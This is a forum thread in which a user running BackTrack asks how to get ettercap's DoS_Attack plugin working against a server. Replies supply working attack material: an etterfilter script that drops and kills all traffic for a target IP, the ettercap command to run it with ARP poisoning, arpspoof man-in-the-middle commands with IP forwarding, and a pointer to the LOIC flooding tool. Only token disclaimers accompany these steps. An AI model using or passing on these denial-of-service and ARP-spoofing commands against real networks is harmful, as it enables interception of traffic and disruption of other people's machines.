Using Ettercap-GTK for DOS_ATTACK help!

post #1 of 8
Thread Starter 
Alright. So I have been using Back|Track4 R2 for penetration testing on my server. I have been trying to get ettercap-GTK (has the nice interface) to work using its DOS_ATTACK plugin. I have some questions... seeing as I can't get it to work. Maybe someone could direct me as to how to. Or correct my mistake.

So, I start by opening ettercap-gtk and scanning for hosts. This gives me 'x' amount of hosts on my network. (normally 4-8) Then I open Host List and view all of the IPs and identify my server. (question: when I run this can I DoS a single pc on the network or only the entire network at once?)
After finding my server, I go to manage plugins and select DoS_Attack and it asks me to select a target IP for victim, so I enter the IP of the server, then it asks for a fake IP. So I enter something random that follows the naming pattern of my network that is not in use by any of our systems. (192.168.x.xxx) so it follows the layout. Then it says (trying to remember exactly) plugin started. Starting DOS Attack...
Then nothing happens. And the system works perfectly fine.
Question: Am I doing something wrong there?
Question: Do I need to ARP poison them for this to work?
Question: Do I set router as target 1 and the server as target 2 if I do need to ARP poison?
Question: What exactly does Unoffensive mode / Offensive mode do? (explanation in 'help' didn't help much)


Thanks SOOO MUCH in advance!!! Been mucking around with this for awhile and it's boggling my mind a lil.
Edited by CrazyDiamond - 4/19/11 at 3:48am
post #2 of 8
Can you use this program "Low Orbit Ion Cannon" ?
post #3 of 8
I suck at these things, but don't you have to select 2 hosts for ARP poison? (victim and router i.e ¿?¿), if that is right the answer to your 3rd question is yes.

+Subs to learn more
post #4 of 8
Thread Starter 
Quote:
Can you use this program "Low Orbit Ion Cannon" ?
lol wut? is that serious or ...?

Quote:
I suck at these things, but don't you have to select 2 hosts for ARP poison? (victim and router i.e ¿?¿), if that is right the answer to your 3rd question is yes.

+Subs to learn more
Yeah for ARP poisoning you need 2 targets. accesspoint/router and victim. But do I need to do ARP poisoning for this DoS Attack? And does router go as target1? I know for sniffing passwords it is target 1 but someone told me sometimes it's target 2??? Idk.
Definitely can't wait to get this cleared up.
post #5 of 8
I've used this method
1st you need to create a file for example > dos.eft
then you paste this
Quote:
if (ip.src == 'TARGET IP' || ip.dst == 'TARGET IP') {
    drop();
    kill();
    msg("Packet Killed\n");
}
save & exit

Quote:
etterfilter dos.eft -o dos.ef
and then simply execute

Quote:
ettercap -T -q -F dos.ef -M ARP /VICTIM IP/ // -i interface
post #6 of 8
To become a man in the middle by spoofing ARP yes you will need the target as well as the router. For example if we have the following:

Router: 192.168.1.1
Target: 192.168.1.50

Using arpspoof we can become a 'man in the middle' by routing all the target's traffic through your backtrack installation as shown below:

Quote:
arpspoof 192.168.1.50 192.168.1.1
Quote:
arpspoof 192.168.1.1 192.168.1.50
Keep in mind in order to do this you will also need to enable IPv4 forwarding in your kernel and launch these two arpspoof commands in two different terminals so you can keep an eye on them.

Enable IPv4 Forwarding:
Quote:
echo 1 > /proc/sys/net/ipv4/ip_forward
Once you are all set up your target should be able to ping google or whatever else and you should be able to pick up the ICMP echo requests using wireshark or whatever packet sniffer you choose. Hope this helps. Oh and.. don't use this for malicious purposes. Whoever reads this and uses it alongside bad judgement is on their own.

Oh and as for running a denial of service attack. That's lame. All it does is render the target useless. There are much better attacks that would be worth your time to learn.
post #7 of 8
Thread Starter 
Quote:
Originally Posted by IaVoR View Post
I've used this method
1st you need to create a file for example > dos.eft
then you paste this

save & exit



and then simply execute
Thanks, I'll give that a try later.
I'm wondering why I can't get the ettercap DoS_Attack plugin to work tho =/ Anyone have any idea on what I'm doing wrong there?
post #8 of 8
Thread Starter 
Quote:
Originally Posted by kc-tr View Post
To become a man in the middle by spoofing ARP yes you will need the target as well as the router. For example if we have the following:

Router: 192.168.1.1
Target: 192.168.1.50

Using arpspoof we can become a 'man in the middle' by routing all the target's traffic through your backtrack installation as shown below:




Keep in mind in order to do this you will also need to enable IPv4 forwarding in your kernel and launch these two arpspoof commands in two different terminals so you can keep an eye on them.

Enable IPv4 Forwarding:


Once you are all set up your target should be able to ping google or whatever else and you should be able to pick up the ICMP echo requests using wireshark or whatever packet sniffer you choose. Hope this helps. Oh and.. don't use this for malicious purposes. Whoever reads this and uses it alongside bad judgement is on their own.

Oh and as for running a denial of service attack. That's lame. All it does is render the target useless. There are much better attacks that would be worth your time to learn.
Yes. I understand about ARP Poisoning and needing the router as a target as well as the victim, but what I'm mainly curious about is if I need to have that running on the network for the DoS_attack plugin to work properly? Sounds like it shouldn't but I can't seem to get it to work so thought it would be worth pointing out.
And yes, don't use this for malicious purposes anyone reading this thread. For obvious reasons.
And I know there are much better attacks, but I'm trying to start out with some basics and work my way around. Quite new to this.
Thanks for the advice and input!